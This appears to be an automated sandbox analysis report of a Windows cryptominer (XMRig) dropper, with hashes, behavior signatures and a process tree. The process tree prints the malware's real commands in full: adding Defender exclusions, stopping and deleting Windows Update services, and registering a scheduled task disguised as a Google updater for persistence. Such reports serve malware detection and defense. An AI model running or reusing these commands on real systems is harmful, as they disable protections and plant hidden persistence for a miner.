Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
-
submitted
02/11/2022, 13:16
General
-
Target
d612dc0be127db5013bfc7c8310e8c27c2b4f738d44e1c6222c7bcd4baece8fe.exe
-
Size
4.0MB
-
MD5
7b9e14ff7002ae1cd4379d4e0bd92328
-
SHA1
dacf6c92c7caa03e64fa15870835aa3c8c9f3797
-
SHA256
d612dc0be127db5013bfc7c8310e8c27c2b4f738d44e1c6222c7bcd4baece8fe
-
SHA512
a30cd27bb6a00a5ba868eb39dde1e2005b6517f911a28cf553b51f789d6204102f2f6f4fa8d55cf130ac72c5dd235828079b45c535793fffe2108aad2c52ca60
-
SSDEEP
49152:L2eYlEmMK/x4hc1RnCy6/6UaYfHBeyFqfZ4USdh0q0MAEwIwStgc4BO7bZu8xPZ:L2zN1Rx0hpexfZKh0q0xEwst0Bg88H
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 2 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\d612dc0be127db5013bfc7c8310e8c27c2b4f738d44e1c6222c7bcd4baece8fe.exe"C:\Users\Admin\AppData\Local\Temp\d612dc0be127db5013bfc7c8310e8c27c2b4f738d44e1c6222c7bcd4baece8fe.exe"1⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#jjwhcvemx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ihnnqfjnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskEditor" } Else { "C:\Program Files\Google\Chrome\updaterload.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskEditor3⤵
-
-
-
C:\Program Files\Google\Chrome\updaterload.exe"C:\Program Files\Google\Chrome\updaterload.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#jjwhcvemx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe nygibdwsbqcm2⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
-
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe exokbvtqyjcxqmff 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2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.0MB
MD5a33f705aa850763e517e7b99bbc01f54
SHA165ee9bb2b2dd7cff49af1fccc5334d7f932b03ab
SHA256b2495abcef9b5b6bea0310f19c29d36b0b20e87d605655576e8f06ab0f33ea80
SHA51249225d47568a9a62d5a73c8aff4f69cd80bdc878e50fbb4cebb2dc11e14da2242c157883adaa775749bba4d934f62bdcb0ababd52824734dcf54dd01cd794aa6
-
Filesize
4.0MB
MD5a33f705aa850763e517e7b99bbc01f54
SHA165ee9bb2b2dd7cff49af1fccc5334d7f932b03ab
SHA256b2495abcef9b5b6bea0310f19c29d36b0b20e87d605655576e8f06ab0f33ea80
SHA51249225d47568a9a62d5a73c8aff4f69cd80bdc878e50fbb4cebb2dc11e14da2242c157883adaa775749bba4d934f62bdcb0ababd52824734dcf54dd01cd794aa6
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD59334d0c057c8205e76dbd01d22c9d6ec
SHA12701dacc81a7c6bb06226a0ce5f9ad39e6ec8d73
SHA25671d91ff596ae709b34202aec112bc1442dd759a03a4298d4bee11dcce21eaf6b
SHA5121eba0c2c5653e4ae77f5f57a210ead613a733b7ae13d6034e481925b43818f42c16d472bd40367ac4db66961e896c1a8fdb2c1941bc15f5ca3a6ac4160c81cef
-
Filesize
1KB
MD5977f9362613d1b169d1d10cbbc4313f3
SHA120c6b0055fe2ba1b89606a6d109d04a3830b46a1
SHA256fa85851a0f73bc9a4a6191df3c7e879102a0d6ab3960e2b143c7de430ce674fc
SHA512246458f9cdf58e253a9432da9a3b0dc38543487b421823835cc823bf59a34dc8cfc3caeeb9f753bcde31602979348d187261e6577d64d8a3bfd406ddb8e094f0
-
Filesize
3KB
MD5811d351aabd7b708fef7683cf5e29e15
SHA106fd89e5a575f45d411cf4b3a2d277e642e73dbb
SHA2560915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18
SHA512702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a
-
Filesize
1KB
MD5302a7c179ef577c237c5418fb770fd27
SHA1343ef00d1357a8d2ff6e1143541a8a29435ed30c
SHA2569e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f
SHA512f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699
-
Filesize
2KB
MD5d18a832a086b01c29a932516f281909d
SHA1a62aee4fe2996b60599402fa5a79301328602d59
SHA2563969568b60204287d0c52ebce47a4dd2776bd08b5d1e702e7bb6b4127a1751f7
SHA5127a493d7e3f49489f24baea81c022bbc3243910e139bf3b5585667b9daf6968579353488d24d8ae391f618f266700bb9cb057b73bc097fc99528e14d9ecad6328
-
Filesize
128KB
-
Filesize
8.0MB
-
Filesize
256KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
8.0MB
-
Filesize
112KB
-
Filesize
24KB
-
Filesize
136KB
-
Filesize
472KB
-
Filesize
112KB
-
Filesize
740KB
-
Filesize
40KB